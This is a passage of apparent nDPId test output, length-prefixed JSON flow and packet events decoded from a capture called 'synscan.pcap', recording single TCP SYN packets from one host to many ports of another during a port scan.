-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1586,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060802,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":40193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1586,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1576,"flow_packet_id":1,"flow_last_seen":1278275060802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060802,"pkt":"ACYLMQczACWzv5HuCABFAAAsph4AADQGblSsEAAIQA2GNIzTnQHdU4MZAAAAAGACBACXigAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1587,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060802,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1587,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1577,"flow_packet_id":1,"flow_last_seen":1278275060802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060802,"pkt":"ACYLMQczACWzv5HuCABFAAAsS7UAACoG0r2sEAAIQA2GNIzTPozdU4MZAAAAAGACDADt\/wAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1588,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060803,"flow_last_seen":1278275060803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060803,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":54045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1588,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1578,"flow_packet_id":1,"flow_last_seen":1278275060803,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060803,"pkt":"ACYLMQczACWzv5HuCABFAAAsqPsAADcGaHesEAAIQA2GNIzT0x3dU4MZAAAAAGACEABVbgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1589,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1589,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1579,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAsxjsAADYGTDesEAAIQA2GNIzTIPvdU4MZAAAAAGACDAALkQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1590,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3986,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1590,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1580,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAsFQcAADMGAGysEAAIQA2GNIzTD5LdU4MZAAAAAGACEAAY+gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1591,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1591,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1581,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAsW8oAADQGuKisEAAIQA2GNIzTBFndU4MZAAAAAGACBAAwMwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1592,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1592,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1582,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAsd4EAADsGlfGsEAAIQA2GNIzSBFPdUoMYAAAAAGACEAAkPAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1593,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1593,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1583,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAsT2YAADIGxwysEAAIQA2GNIzSAnzdUoMYAAAAAGACDAAqEwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1594,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1594,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1584,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAsWvQAADMGun6sEAAIQA2GNIzSE77dUoMYAAAAAGACEAAU0QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1595,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1334,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1595,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1585,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAseRIAACwGo2CsEAAIQA2GNIzSBTbdUoMYAAAAAGACBAAvWQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1596,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1596,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1586,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAsrV0AADcGZBWsEAAIQA2GNIzSA\/\/dUoMYAAAAAGACEAAkkAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1597,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1597,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1587,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAs4YkAADEGNemsEAAIQA2GNIzSA4fdUoMYAAAAAGACCAAtCAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1598,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1598,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1588,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAsJ20AADAG8QWsEAAIQA2GNIzSAGTdUoMYAAAAAGACBAA0KwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1599,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3703,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1599,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1589,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAs1gMAADkGOW+sEAAIQA2GNIzSDnfdUoMYAAAAAGACCAAiGAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1600,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1028,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1600,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1590,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAsVUAAADgGuzKsEAAIQA2GNIzSBATdUoMYAAAAAGACBAAwiwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1601,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1601,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1591,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAsmTIAAC0GgkCsEAAIQA2GNIzSA4TdUoMYAAAAAGACCAAtCwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1602,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1602,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1592,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAsR1MAACsG1h+sEAAIQA2GNIzSA2ndUoMYAAAAAGACEAAlJgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1603,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1603,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1593,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAsFScAADsG+EusEAAIQA2GNIzSAHfdUoMYAAAAAGACEAAoGAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1604,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":26214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1604,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1594,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAs+kcAACoGJCusEAAIQA2GNIzSZmbdUoMYAAAAAGACDADGKAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1605,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1605,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1595,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAsd6gAAC0Go8qsEAAIQA2GNIzSUVzdUoMYAAAAAGACCADfMgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1606,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1606,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1596,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/sQAADgGEa6sEAAIQA2GNIzTgBDdU4MZAAAAAGACBAC0ewAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1607,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1607,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1597,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAs6v8AADQGKXOsEAAIQA2GNIzTCzvdU4MZAAAAAGACBAApUQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1608,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1608,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1598,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAsPkcAAC8G2yusEAAIQA2GNIzTBGrdU4MZAAAAAGACEAAkIgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1609,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1609,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1599,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAsk0UAACgGjS2sEAAIQA2GNIzTwPjdU4MZAAAAAGACBABzkwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1610,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 